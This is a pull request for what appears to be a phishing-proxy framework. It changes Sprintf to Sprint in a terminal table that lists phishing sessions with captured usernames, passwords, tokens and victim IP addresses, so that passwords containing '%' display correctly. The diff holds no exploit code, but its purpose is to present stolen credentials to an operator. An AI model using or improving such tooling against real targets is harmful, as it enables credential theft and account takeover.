### PR TITLE
Fix session table display bug

### DIFF
--- a/core/terminal.go
+++ b/core/terminal.go
@@ -340,11 +340,11 @@ func (t *Terminal) handleSessions(args []string) error {
 		}
 		var rows [][]string
 		for _, s := range sessions {
-			tcol := dgray.Sprintf("none")
+			tcol := dgray.Sprint("none")
 			if len(s.Tokens) > 0 {
-				tcol = lgreen.Sprintf("captured")
+				tcol = lgreen.Sprint("captured")
 			}
-			row := []string{strconv.Itoa(s.Id), lred.Sprintf(s.Phishlet), lblue.Sprintf(truncateString(s.Username, 24)), lblue.Sprintf(truncateString(s.Password, 24)), tcol, yellow.Sprintf(s.RemoteAddr), time.Unix(s.UpdateTime, 0).Format("2006-01-02 15:04")}
+			row := []string{strconv.Itoa(s.Id), lred.Sprint(s.Phishlet), lblue.Sprint(truncateString(s.Username, 24)), lblue.Sprint(truncateString(s.Password, 24)), tcol, yellow.Sprint(s.RemoteAddr), time.Unix(s.UpdateTime, 0).Format("2006-01-02 15:04")}
 			rows = append(rows, row)
 		}
 		log.Printf("\n%s\n", AsTable(cols, rows))
@@ -372,9 +372,9 @@ func (t *Terminal) handleSessions(args []string) error {
 				}
 
 				s_found = true
-				tcol := dgray.Sprintf("empty")
+				tcol := dgray.Sprint("empty")
 				if len(s.Tokens) > 0 {
-					tcol = lgreen.Sprintf("captured")
+					tcol = lgreen.Sprint("captured")
 				}
 
 				keys := []string{"id", "phishlet", "username", "password", "tokens", "landing url", "user-agent", "remote ip", "create time", "update time"}


### PR DESCRIPTION
The session summary display table in terminal.go previously used
Sprintf for formatting text (phishlet, username, password, and URL).

When any of these contined a '%' followed by specific characters,
as might happen in a complex password, Sprintf would read the string
as having a placeholder and display a "(MISSING)" message in the text
since no placeholder was supplied.

Here is an example with a password that contains %v:
![image](https://user-images.githubusercontent.com/15677350/107304940-03495e80-6a50-11eb-9c9f-947bfc23d896.png)

This commit changes Sprintf to Sprint for values which should not
contain format placeholders. Since Sprint does not accept patterns,
there is no chance of error even if the text contains a '%', and the value
displays correctly.
